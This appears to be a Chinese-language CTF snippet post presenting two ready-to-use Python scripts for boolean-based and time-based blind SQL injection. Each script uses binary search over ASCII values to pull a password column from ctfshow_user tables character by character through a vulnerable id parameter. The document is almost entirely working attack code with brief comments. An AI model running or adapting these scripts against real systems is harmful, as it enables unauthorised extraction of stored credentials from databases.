SQL注入之二分法

常用单个布尔盲注二分法

import requests
url = "http://xxx?id=1' and 1="
flag = ""
for i in range(1,100):
    low = 32
    high = 128
    while low < high:
        mid = (low + high)//2	#找到中值
        content = "select  password from ctfshow_user4 limit 24,1"
        sql = f"if(ascii(substr(({content}),{i},1))<{mid},1,0)--+"
        url2 = url+sql
        r = requests.get(url2)
        if "admin" in r.text:
            high = mid
        else:
            low = mid + 1
    if low == high == 32:
        print("No  result")
        break
    flag += chr((high + low - 1)//2)
    print(flag)

常用单个时间盲注二分法

import time
import requests
url = "http://xxx?id=1' and "
flag = ""
for i in range(1,100):
    low = 32
    high = 128
    while low < high:
        mid = (low + high)//2
        content = "select  password from ctfshow_user5 limit 24,1"
        sql = f"if(ascii(substr(({content}),{i},1))<{mid},sleep(1),0)--+"
        url2 = url+sql
        timeStart = time.time()#获取执行前时间
        r = requests.get(url2)
        timeEnd = time.time()#获取执行后时间
        if timeEnd - timeStart >= 1:
            high = mid
        else:
            low = mid + 1
    if low == high == 32:
        print("No  result")
        break
    flag += chr((high + low - 1)//2)
    print(flag)